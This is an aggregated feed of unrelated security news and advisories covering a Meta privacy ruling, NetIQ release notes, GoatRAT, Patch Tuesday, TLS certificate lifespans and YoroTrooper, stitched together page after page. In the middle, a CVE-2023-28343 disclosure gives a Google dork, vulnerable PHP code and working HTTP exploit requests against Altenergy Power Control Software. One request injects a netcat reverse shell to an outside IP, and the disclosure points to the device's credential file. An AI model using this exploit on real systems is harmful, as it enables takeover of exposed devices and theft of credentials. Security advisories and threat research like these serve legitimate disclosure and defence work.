Categories: News
Categories: Privacy
Two European privacy watchdogs have won cases against Meta. The rulings may have serious consequences for European website owners.



(Read more...)




The post Facebook illegally processed user data, says court appeared first on Malwarebytes Labs.

Posted: March 16, 2023 by

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn't mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users' browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was "pleased" with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

**Austria**

In Austria, the Datenschutzbehörde (DSB) ruled that a complaint that Meta’s tracking pixels by the privacy organization noyb were conflicting with European GDPR rules was partially upheld. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA in a data transfer without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against **Google Analytics** as being in conflict with GDPR regulations. According to noyb, the same rules apply to **Facebook Login** and **Meta Pixel** because these tools also send data to the US.

Together these rulings may have serious consequences for all European based website owners. Because of the transferred responsibility the website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

Facebook illegally processed user data, says court

Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2

March 2023

Advanced Authentication 6.4 Service Pack 1 Patch 1 includes enhancements, and resolves several previous issues.

Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure that our products meet all your needs. You can post feedback in the Advanced Authentication forum on NetIQ Communities, our online community that also includes product information, blogs, and links to helpful resources. You can also post or vote for the ideas of enhancement requests in the Ideas forum.

For more information about this release and the latest release notes, see the NetIQ Advanced Authentication Documentation page.

If you have suggestions for documentation improvements, click at the bottom of the specific page in the HTML version of the documentation posted at the NetIQ Advanced Authentication Documentation page.

**1.0 What’s New?**

Advanced Authentication 6.4 Service Pack 1 Patch 1 provides the following:

*   Enhancements
    
*   Security Improvement
    

**1.1 Enhancements**

Advanced Authentication 6.4 Service Pack 1 Patch 1 includes the following enhancements:

*   FIDO2 Improvements
    
*   Ability to Add Twilio Subaccounts in the SMS Sender Policy
    
*   An Option to Allow Third-Party Service Providers to Select the Chain for Any Client
    

**FIDO2 Improvements**

The following enhancements have been added to the FIDO2 method:

*   Ability to Enroll Resident Credentials
    
    The administrator can allow users to enroll the FIDO2 method and store the Resident Credentials (security key) on the FIDO2-compliant device (YubiKey). With Resident Credentials, users can experience seamless login without specifying their username and password.
    
*   Username-less Login Support
    
    Advanced Authentication extends the FIDO2 method to support the username-less authentication to the Web Authentication events. The enrolled FIDO2 card contains the username. When the user taps the card, the username is filled in the respective field automatically. To configure the username-less authentication, three options have been introduced in the FIDO2 method.
    
*   Ability to Disable the PIN Prompt
    
    Advanced Authentication facilitates the administrator to mandate or hide the PIN prompt when users enroll, test and authenticate with the FIDO2 method.
    
    For more information, see FIDO2 in the Advanced Authentication - Administration guide.
    

**Ability to Add Twilio Subaccounts in the SMS Sender Policy**

This release provides ability to add the subaccounts of Twilio Parent account. With subaccounts, you can add Country Codes based on the customer’s (SMS receivers) geographic location. The subaccounts distinguish the usage based on team, customer or product, and provides clear billing data. Also, allows resource (phone number) mapping.

For more information, see SMS Sender in the Advanced Authentication - Administration guide.

**An Option to Allow Third-Party Service Providers to Select the Chain for Any Client**

This release introduces the option in the policy to allow the third-party service providers to select a preferred chain for any client, such as Windows Client, Mac OS X Client, and Linux PAM Client workstation. Then, route users to the selected chain during authentication.

For more information, see Enabling the Client Chain Selection in the Advanced Authentication - Administration guide.

**1.2 Security Improvement**

Advanced Authentication 6.4 Service Pack 1 Patch 1 release addresses CVE-2023-24468.

**2.0 Resolved Issues**

This release includes the following software fixes:

Component

Description

Administration

When a user sets to in the policy, then the list in the does not display all the available chains.

Administration

On the , enrollment of the U2F method fails on the following browser:

*   Google Chrome
    
*   Microsoft Edge
    
*   Mozilla Firefox
    

Administration

The option is modified to in the policy.

Administration

The option is modified to in the method.

Smartphone

When a user tries to authenticate with the method, a prompt to specify the PIN (User Verification) is not displayed on the Android devices.

Smartphone

When a user attempts to authenticate with the NetIQ Advanced Authentication iOS smartphone application by using the facial recognition, the application does not identify the face and prompts the user to re-authenticate. Users are experiencing infinite authentication loop.

Smartphone

When a user sets the option to in the NetIQ Advanced Authentication iOS smartphone application settings for face recognition authentication. Later, the user is unable to set the option to .

Smartphone

When a user sets the smartphone language to Arabic, the NetIQ Advanced Authentication iOS smartphone application stops working.

Windows Client

While connecting to the remote desktop on the Windows Client, the Advanced Authentication Credential Provider does not display the chains that require Device Service for the elevated access.

**3.0 Upgrading**

You can directly upgrade to Advanced Authentication 6.4 Service Pack 1 Patch 1 from 6.4.1.

_NOTE:_The following is the recommended upgrade sequence:

1.  Advanced Authentication servers
    
2.  Plug-ins
    
3.  Client components
    
    Any change in the upgrade sequence is not supported.
    

_NOTE:_The RAM requirements of Advanced Authentication have been changed in 6.4 as follows:

*   Minimum: 8 GB per server.
    
*   Recommended: 12 GB per server
    

Before upgrading your Advanced Authentication cluster to 6.4, ensure that the environment complies with the new requirements.

For more information, see Advanced Authentication System Requirements.

**4.0 Known Issue**

Advanced Authentication 6.4 Service Pack 1 Patch 1 does not have any known issue.

**5.0 Contact Information**

Our goal is to provide documentation that meets your needs. If you have suggestions for improvements, please email Documentation-Feedback@netiq.com. We value your input and look forward to hearing from you.

For detailed contact information, see the Support Contact Information website.

For general corporate and product information, see the NetIQ Corporate website.

For interactive conversations with your peers and NetIQ experts, become an active member of our community. The NetIQ online community provides product information, useful links to helpful resources, blogs, and social media channels.

**6.0 Legal Notice**

© Copyright 2023 Micro Focus or one of its affiliates.

The only warranties for products and services of Micro Focus and its affiliates and licensors (“Micro Focus”) are as may be set forth in the express warranty statements accompanying such products and services. Nothing herein should be construed as constituting an additional warranty. Micro Focus shall not be liable for technical or editorial errors or omissions contained herein. The information contained herein is subject to change without notice.

For additional information, such as certification-related notices and trademarks, see https://www.microfocus.com/en-us/legal.

CVE-2023-24468: Advanced Authentication 6.4 Service Pack 1 Patch 1 Release Notes

The new malware was discovered targeting three banks in Brazil.

Another Android banking Trojan with the capability to make instant unauthorized money transfers is targeting Brazilian banks as part of a growing trend among threat actors to exploit a new automated payment system in Latin America.

The new GoatRAT — like BraxDex, Senomorphy, and PixPirate before it — steals the Pix key of the mobile devices it targets to make instant payments from compromised accounts, researchers from Cyble revealed in a blog post. Attackers behind GoatRAT use that key to access the Pix payment platform, created and operated by the Brazil Central Bank for users to make instant mobile payments across Latin America using a variety of banks.

So far, the Cyble researchers have observed the RAT — which they said was created first as an Android remote administration tool to take control over victims' devices — targeting three Brazilian banks: NUBank, Banco Inter, and PagBank.

Making automated transfers appears to be the sole aim of the Trojan, which unlike similar malware doesn't include the ability to steal authentication codes or incoming SMS messages, according to the findings.

The malware is part of a growing trend by threat actors over the last six months to create more sophisticated banking malware that includes an automatic transfer system (ATS) framework, "allowing attackers to conduct unauthorized money transfers on infected devices," the Cyble researchers wrote.

"This new variant highlights that in the current technological landscape, there is an elevated risk of cyber attacks that do not require multiple permissions or many banking trojan functionalities to execute financial fraud," the report said.

Indeed, mobile banking Trojan deployment overall is on the rise, with nearly 200,000 new variants of this malware emerging in 2022, according to Kaspersky's "Mobile Threats in 2022" report. This number represents a 100% increase from the year before and the biggest acceleration of mobile malware development seen in the last six years.

**How GoatRAT Makes Instant Transfers**

GoatRAT typically uses a four-step process to perform automated transfers once it infects a user's device. The researchers outlined the system used specifically for the Banco Inter mobile banking application; however, the Trojan also has incorporated similar functions to carry out automatic transfers for the other banking applications, such as NUBank and PagBank, that it targets, they said.

GoatRAT first abuses the Accessibility Service on an Android device to verify that the name of the active package matches one of a list of targeted application package names, and then deploys a further infection.

Once the targeted app is identified, the malware creates a fake banking overlay window that appears above the legitimate application to hide its malicious activity from the victim. This and another covert process allow the Trojan to enter an amount of money to transfer as well as the device's Pix key into the legitimate banking app without alerting the victim, the researchers said.

The malware also introduces an automatic clicking mechanism for the “Confirm” and “Pay” buttons of the legitimate banking app to complete the instant money transfer. Once this transfer is complete, it removes the overlay window from the top of the legitimate banking app and the malicious process is concluded.

**Defending Against ATS Trojans**

Researchers made several security recommendations that go along with typical best practices for downloading and using mobile applications to keep devices free of infection from Trojans and other malware that not only can steal funds but also spread to enterprise networks through connected devices.

Mobile device users should only download and install software from official app stores like Google Play Store or the iOS App Store, and use a reputed antivirus and Internet security software package on all connected devices, including not only mobile but also on PCs and laptops, the researchers advised.

They also recommended users never share details for payment cards with untrusted sources and use strong passwords and enforce multifactor authentication (MFA) on mobile devices wherever possible. Further, implementing biometric security features such as fingerprint or facial recognition for unlocking their mobile devices wherever possible, is key, the researchers said.

Other commonsense security rules that researchers advised but which users often ignore are to keep devices, operating systems, and apps updated, and avoid opening links received via SMS or emails delivered to mobile devices. Users should take care when enabling any permissions on devices, and ensure that Google Play Protect is enabled on Android devices, the Cyble researchers added.

GoatRAT Android Banking Trojan Targets Mobile Automated Payment System

SQL Injection (SQLi) vulnerability in RichPlugins Plugin for Google Reviews plugin <= 2.2.3 versions.

**Solution**

Update the WordPress Plugin for Google Reviews plugin to the latest available version (at least 2.2.4).

Rafie Muhammad (Patchstack) discovered and reported this SQL Injection vulnerability in WordPress Plugin for Google Reviews Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information. This vulnerability has been fixed in version 2.2.4.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-44580: WordPress Plugin for Google Reviews plugin <= 2.2.3 - Auth. SQL Injection (SQLi) vulnerability - Patchstack

Microsoft's Patch Tuesday update for March 2023 is rolling out with remediations for a set of 80 security flaws, two of which have come under active exploitation in the wild.
Eight of the 80 bugs are rated Critical, 71 are rated Important, and one is rated Moderate in severity. The updates are in addition to 29 flaws the tech giant fixed in its Chromium-based Edge browser in recent weeks.
The

Patch Tuesday / Software Update

Microsoft's Patch Tuesday update for March 2023 is rolling out with remediations for a set of 80 security flaws, two of which have come under active exploitation in the wild.

Eight of the 80 bugs are rated Critical, 71 are rated Important, and one is rated Moderate in severity. The updates are in addition to 29 flaws the tech giant fixed in its Chromium-based Edge browser in recent weeks.

The two vulnerabilities that have come under active attack include a Microsoft Outlook privilege escalation flaw (CVE-2023-23397, CVSS score: 9.8) and a Windows SmartScreen security feature bypass (CVE-2023-24880, CVSS score: 5.1).

CVE-2023-23397 is "triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server," Microsoft said in a standalone advisory.

A threat actor could leverage this flaw by sending a specially crafted email, activating it automatically when it is retrieved and processed by the Outlook client for Windows. As a result, this could lead to exploitation without requiring any user interaction and before even the message is viewed in the Preview Pane.

Microsoft credited the Computer Emergency Response Team of Ukraine (CERT-UA) with reporting the flaw, adding it is aware of "limited targeted attacks" mounted by a Russia-based threat actor against government, transportation, energy, and military sectors in Europe.

CVE-2023-24880, on the other hand, concerns a security bypass flaw that could be exploited to evade Mark-of-the-Web (MotW) protections when opening untrusted files downloaded from the internet.

It is also the consequence of a narrow patch released by Microsoft to resolve another SmartScreen bypass bug (CVE-2022-44698, CVSS score: 5.4) that came to light last year and which was exploited by financially motivated actors to deliver Magniber ransomware.

"Vendors often release narrow patches, creating an opportunity for attackers to iterate and discover new variants," Google Threat Analysis Group (TAG) researcher Benoit Sevens said in a report.

"Because the root cause behind the SmartScreen security bypass was not addressed, the attackers were able to quickly identify a different variant of the original bug."

TAG said it observed over 100,000 downloads of malicious MSI files signed with malformed Authenticode signature since January 2023, thereby permitting the adversary to distribute Magniber ransomware without raising any security warnings. A majority of those downloads have been associated with users in Europe.

The disclosure also comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the two flaws to the Known Exploited Vulnerabilities (KEV) catalog and announced a new pilot program that aims to warn critical infrastructure entities about "vulnerabilities commonly associated with known ransomware exploitation."

Also closed out by Microsoft are a number of critical remote code execution flaws impacting HTTP Protocol Stack (CVE-2023-23392, CVSS score: 9.8), Internet Control Message Protocol (CVE-2023-23415, CVSS score: 9.8), and Remote Procedure Call Runtime (CVE-2023-21708, CVSS score: 9.8).

Other notable mentions include patches for four privilege escalation bugs identified in the Windows Kernel, 10 remote code execution flaws affecting Microsoft PostScript and PCL6 Class Printer Driver, and a WebView2 spoofing vulnerability in the Edge browser.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Elsewhere, Microsoft also closed out two information disclosure flaws in Microsoft OneDrive for Android, one spoofing vulnerability in Office for Android, one security bypass bug in Microsoft OneDrive for iOS, and one privilege escalation issue in OneDrive for macOS.

Rounding off the list are patches for two high-severity vulnerabilities in the Trusted Platform Module (TPM) 2.0 reference library specification (CVE-2023-1017 and CVE-2023-1018, CVSS scores: 8.8) that could lead to information disclosure or privilege escalation.

**Software Patches from Other Vendors**

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   Android
*   Apache Projects
*   Aruba Networks
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   IBM
*   Jenkins
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Qualcomm
*   Samba
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SonicWall
*   Sophos
*   Synology
*   Trend Micro
*   Veeam
*   Zoho, and
*   Zoom

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Rolls Out Patches for 80 New Security Flaws — Two Under Active Attack

Organizations will likely have until the end of 2024 to gain visibility and control over their keys and certificates.

Google is proposing to reduce the life span of digital certificates used to secure websites and other online communications to just 90 days. Currently, public Transport Layer Security (TLS) certificates have a maximum validity of 13 months, or 398 days.

Certificate authorities issue TLS certificates (also called Secure Socket Layer, or SSL, certificates) with an expiration date. The life span of these certificates have been shrinking over the last few years, since frequently cycling them makes it harder for attackers to use fraudulent certificates.

In the Chromium Project's “Moving Forward, Together” roadmap, Google suggested the change to 90 days could be made either in the form of a future policy update or as a CA/B Forum Ballot Proposal. If the CA/B Forum, a consortium of browser makers, certificate authorities, and other stakeholders in the digital certificate ecosystem, doesn't formally make 90 days the industry standard, Google can unilateral force this change on the industry by making the shorter validity period a requirement for the Chrome root program. Browsers control their own root program requirements, so browser makers don't have to wait for formal rule changes from the CA/B Forum. By virtue of Chrome's market share, if Google makes this change for Chrome, that makes it a de facto standard that every commercial public certificate authority would have to follow.

The impact goes beyond browser makers and certificate authorities as organizations will need to renew their digital certificates more often. The process, if handled manually, can be a brittle process, as it involves identifying certificates about to expire, getting new ones issued, revoking the old ones, and deploying the new certificates. With the new validity period, IT security teams will have to handle renewals four times a year for each certificate -- an arduous task considering most enterprises have many certificates and that number is growing rapidly.

Google did not provide a specific timeline in its roadmap but based on how the changes have unfolded in the past, the new validity period will likely take effect by the end of 2024, which gives organizations time to gain visibility and control over their keys and certificates.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Proposes Reducing TLS Cert Life Span to 90 Days

By Owais Sultan
Do you really get more value from a paid cloud storage service, or are free clouds enough? Here’s…
This is a post from HackRead.com Read the original post: Beyond Price Point: Analyzing Differences in Cloud Storage Options

****Do you really get more value from a paid cloud storage service, or are free clouds enough? Here’s what you should know to balance quality against budget.****

If you are looking at different cloud storage reviews to find the best option for you, it can be confusing. The market is saturated; there are hundreds of cloud services providing free and paid packages with an assortment of features. Even tech-savvy consumers could be overwhelmed by the sheer amount of choices they are faced with.

Many cloud providers offer free accounts with a limited amount of storage as well as paid accounts that have more features and a larger capacity. Because of this, they are presented as the better and sometimes more effective option, but is this really true? Are paid cloud storage services better than free cloud storage services?

**The Case for Free Cloud Storage Accounts**

There are some people who will tell you that free accounts with cloud storage services are somehow less valuable than paid accounts. This is not necessarily true. Free accounts can be beneficial and are effective as a method of storing data and files; they are simply more limited than paid accounts in some ways.

Free accounts benefit from the same security protocols and high-quality servers as paid accounts. They also generally have the encryption benefits as paid accounts, because these features are built into the overall service (this is not guaranteed, however, so be sure to double-check). Likewise, free accounts usually benefit from the same multi-factor authentication features as paid accounts.

The differences tend to lie in the range of extra features offered by a provider. For example, free accounts tend to have:

*   Less storage space
*   More basic features
*   Limited capabilities
*   Restricted bandwidth

As such, free accounts may not have auto-syncing, the ability to recover previous versions of documents, or the capacity for collaborative editing and working.

However, if you need a basic cloud storage server for personal use and don’t need a huge amount of space, free accounts can be just as secure and effective as paid accounts. It’s all about what you require; there’s no point in paying for more than you need if you don’t have to.

**Are Paid Storage Accounts Worth It?**

Paid cloud storage accounts have many benefits; this cannot be disputed. Depending on the server, paid accounts may come with higher levels of security and encryption, and generally offer a large number of extra functionality features that can make it easier to share documents and undertake more complex tasks. Paid accounts most commonly have these benefits:

*   Higher storage limits
*   Auto syncing features
*   Premium customer support services
*   Extra features to enable collaborative working
*   Unrestricted bandwidth or bandwidth with higher limits

These features are essential for people who need to upload or download large files, share files with colleagues or friends, or need those extra functionality features for complex projects. So, whether you decide to pay for an upgraded account or not is really up to you and what you need from your cloud storage.

**Paid vs. Free Cloud Services – Which is Better?**

In the end, there is no single answer. Free and paid cloud storage services have their place in the market and suit different people for different reasons. When you consider different cloud services and the packages that they offer, you should ask yourself the following questions:

**What is my budget?**

If you don’t need much, opt for a free account that matches all of your requirements. If you need a little extra, look for basic paid accounts that give you what you need within your budget. This is the benefit of having such a vast array of providers to choose from; there is an option for every budget.

**How much storage space do I anticipate needing?**

Free accounts range in storage size. Dropbox offers 2GB as standard, while Google Drive offers 15 GB. If you need more, there are reasonably priced options out there. iDrive, for example, offers better storage at a lower cost than many comparable competitors. If you need storage space without frills, this kind of account is for you.

**Are there any features that I must have or really want?**

If auto-syncing or the ability to recover previous document versions is important to you, then you can find both free and paid accounts that offer these features. If security and airtight encryption matter to you, prioritize these features within your budget; you will find something that works for you.

**How important is multi-layered security for me?**

All cloud storage providers prioritize security, but some providers and accounts have extra security features to protect sensitive documents in the event of a breach. If you work with highly sensitive information, this is something to think about.

There are other concerns, of course, but these four questions encompass the most basic concerns when it comes to cloud storage services. Once you have the answers to these questions, you can decide what else matters to you.  

1.  The 5 Best Cloud Performance Monitoring Tools
2.  Cloud Hacking – Why API Remains the Biggest Threat?
3.  Cloud data distract firms from correct data security practices

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Beyond Price Point: Analyzing Differences in Cloud Storage Options

OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.

Permalink

Cannot retrieve contributors at this time

**title : OS command injection affects "Altenergy Power Control Software"****SW ver : C1.2.5****Vendor : https://apsystems.com/****Google Dork : intitle:"Altenergy Power Control Software"****Affected device : ENERGY COMMUNICATION UNIT**

**vulnerable code :**

"/home/local\_web/pagesapplication/models/management\_model.php"

   public function set\_timezone()
    {
        $results = array();

        //ΦÄ╖σÅûΘí╡Θ¥óΘÇëµï⌐τÜäµù╢σî║
        $timezone = $this\->input\->post('timezone');
        if(strlen($timezone) == 0)
                $timezone = "Asia/Taipei";

        //Φ«╛τ╜«linuxτ│╗τ╗ƒµù╢σî║
        $cmd = "cp /usr/share/zoneinfo/$timezone /etc/localtime";
        system($cmd);

        //σ░åµù╢σî║Σ┐¥σ¡ÿσê░Θàìτ╜«µûçΣ╗╢
        $fp = @fopen("/etc/yuneng/timezone.conf",'w');
        if($fp){
            fwrite($fp, $timezone);
            fclose($fp);
        }

**Exploit :**

HTTP request :

    POST /index.php/management/set_timezone HTTP/1.1
    Host: 78.218.230.32:8081
    Content-Length: 33
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://78.218.230.32:8081
    Referer: http://78.218.230.32:8081/index.php/management/datetime
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    timezone=`mknod /tmp/backpipe p `
    

HTTP request :

    POST /index.php/management/set_timezone HTTP/1.1
    Host: 78.218.230.32:8081
    Content-Length: 73
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://78.218.230.32:8081
    Referer: http://78.218.230.32:8081/index.php/management/datetime
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    timezone=`/bin/sh 0</tmp/backpipe | nc 156.197.154.12 4444 1>/tmp/backpipe`
    
    

POC :

\*\* note \*\*

*   please use the following command after getting shell to avoid distorying the WEBUI.  
    "echo Asia/Taipei > /etc/yuneng/timezone.conf"

**Important files to check :**

*   /etc/yuneng/passwd.conf this file contains the credentials for the WebUI.

CVE-2023-28343: Disclosures/os_command_injection.md at main · ahmedalroky/Disclosures

BP Monitoring Management System v1.0 was discovered to contain a SQL injection vulnerability via the emailid parameter in the login page.

**BP Monitoring Management System using PHP and MySQL**

BP Monitoring Management System is a web-based application. This application is to maintain the record of the BP details of the family members datewise.

**Project Requirements**

Project Name

BP Monitoring Management System Project in PHP

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In BP monitoring Management Project we use PHP and MySQL Database. BP monitoring Management System has one module i.e user.

**User Module**

**User Registration:** In this section, the user can register himself. A one-time registration is required for every user.

**User login:** In this section, users can log in with a valid email id and password.

**Dashboard:** In this section, the User can view the total listed family members and total BP records count.

**Family Members:** In this section, the user can add, edit and delete the family members.

**BP:** In this section, the user can add, edit and delete the family member BP details.

**Reports:** In this section, the User can generate the b/w dated report of a particular family member.

User can also update their profile, change their password and recover their password.

****Some of the Project Screens****

**User Signup**

**User Dashboard**

**Add BP Details**

**Manage BP Details**

**How to run the BP Monitoring Management System (bpmms) Project**

1\. Download the zip file

2\. Extract the file and copy bpmms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name bpmmsdb

6\. Import bpmmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/bpmms

**Credential for User panel :**

**Username:** john@test.com  
**Password:** Test@123

**View Demo**

**Download BPMMS Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2023-27074: BP Monitoring Management System | BP Monitoring Management Project

Cisco Talos has identified a new espionage oriented threat actor, which we are naming “YoroTrooper,” targeting a multitude of entities in Europe and Turkey.

Tuesday, March 14, 2023 07:03

_By_ _Asheer Malhotra_ _and_ _Vitor Ventura__._  

*   Cisco Talos has identified a new threat actor, which we are naming “YoroTrooper,” that has been running several successful espionage campaigns since at least June 2022.  
    
*   YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States (CIS), based on our analysis. We also observed YoroTrooper compromise accounts from at least two international organizations: a critical European Union (EU) health care agency and the World Intellectual Property Organization (WIPO). Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan. We assess the actor also likely targets other organizations across Europe and Turkish (Türkiye) government agencies.  
    
*   Information stolen from successful compromises include credentials from multiple applications, browser histories & cookies, system information and screenshots.  
    
*   YoroTrooper’s main tools include Python-based, custom-built and open-source information stealers, such as the Stink stealer wrapped into executables via the Nuitka framework and PyInstaller. For remote access, YoroTrooper has also deployed commodity malware, such as AveMaria/Warzone RAT, LodaRAT and Meterpreter.  
    
*   The infection chain consists of malicious shortcut files (LNKs) and optional decoy documents wrapped in malicious archives delivered to targets. The actor appears intent on exfiltrating documents and other information, likely for use in future operations.

**Introducing YoroTrooper**

This new threat actor we are naming “YoroTrooper” has been targeting governments across Eastern Europe since at least June 2022, and Cisco Talos has found three different activity clusters with overlapping infrastructure that are all linked to the same threat actor. Cisco Talos does not have a full overview of this threat actor, as we were able to collect varying amounts of detail in each campaign. In some cases, for instance, we were able to fully profile a campaign, while in other cases, we only identified the infrastructure or compromised data.  

Our assessment is that the operators of this threat actor are Russian language speakers, but not necessarily living in Russia or Russian nationals since their victimology consists mostly of countries in the Commonwealth of Independent States (CIS). There are also snippets of Cyrillic in some of their implants, indicating that the actor is familiar with the language. Also, in some cases, the attackers are targeting Russian language endpoints (with Code Page 866), indicating a targeting of individuals speaking that specific language.  

Espionage is the main motivation for this threat actor, according to the tactics, techniques and procedures (TTPs) we have analyzed. To trick their victims, the threat actor either registers malicious domains and then generates subdomains or registers typo-squatted domains similar to legitimate domains from CIS entities to host malicious artifacts. The table below contains some of the domains created by this actor.

Malicious subdomain

Legitimate domain

Entity

mail\[.\]mfa\[.\]gov\[.\]kg\[.\]openingfile\[.\]net

mfa\[.\]gov\[.\]kg

Kyrgyzstan’s Ministry of Foreign Affairs

akipress\[.\]news

akipress\[.\]com

AKI Press News Agency (Kyrgyzstan-based)

maileecommission\[.\]inro\[.\]link

commission\[.\]europa\[.\]eu

European Commission’s email

sts\[.\]mfa\[.\]gov\[.\]tr\[.\]mypolicy\[.\]top

mfa\[.\]gov\[.\]tr

Turkey’s Ministry of Foreign Affairs

industry\[.\]tj\[.\]mypolicy\[.\]top

industry\[.\]tj

Tajikistan’s Ministry of Industry and New Technologies

mail\[.\]mfa\[.\]az-link\[.\]email

mail\[.\]mfa\[.\]az

Azerbaijan’s Ministry of Foreign Affairs

belaes\[.\]by\[.\]authentication\[.\]becloud\[.\]cc

belaes\[.\]by

Belarusian Nuclear Power Plant (Astravets)

belstat\[.\]gov\[.\]by\[.\]attachment-posts\[.\]cc

belstat\[.\]gov\[.\]by

National Statistical Committee of Belarus

minsk\[.\]gov\[.\]by\[.\]attachment-posts\[.\]cc

minsk\[.\]gov\[.\]by

Official Website of the Government of Minsk (Belarus)

The initial attack vectors are phishing emails with a file attached, which usually consists of an archive consisting of two files: a shortcut file and a decoy PDF file. The shortcut file is the initial trigger for the infection, while the PDF is the lure to make the infection look legitimate. The full details of the campaigns are detailed in the section below.  

Regarding YoroTrooper’s toolset, the actor uses several commodity remote access trojans (RAT) and credential stealers. For RATs, we have seen the usage of AveMaria/Warzone RAT, LodaRAT, and a custom-built implant based on Python. Credential stealers used by YoroTrooper are either custom scripts, which in some cases are based on the open-sourced Lazagne project or commodity stealers such as the Stink Stealer. All the Python-based malware used in the campaign is wrapped up into an executable using frameworks such as Nuitka or PyInstaller. The custom implants (stealers and RATs) use Telegram bots to exfiltrate information or receive commands from the operator.

**Successful infections and breaches by YoroTrooper  
**

Our analysis has shown that YoroTrooper successfully obtained access to credentials of at least one account from a critical EU health care agency’s internet-exposed system and another from the World Intellectual Property Organization (WIPO). However, it is unclear if the threat actors targeted these institutions specifically via such phishing domains or if the credentials were compromised because they belong to users from a specific list of targeted countries in Europe. We found malicious domains masquerading as those of legitimate European Union government agencies, such as “maile**ecommission**\[.\]inro\[.\]link”, which indicates that other European institutions were targeted.  

YoroTrooper also successfully compromised embassies belonging to Turkmenistan and Azerbaijan, where the operators attempted to exfiltrate documents of interest and deploy additional malware.  

Typically, YoroTrooper employs information stealers and RATs. An analysis of their stolen data reveals a treasure trove of information stolen from infected endpoints, such as credentials, histories and cookies for multiple browsers. Information such as credentials is highly valuable as they may be used either during lateral movement efforts or during subsequent YoroTrooper campaigns. Browsing histories can be used by a threat actor to specifically target victims with phishing lures based on their browsing habits.

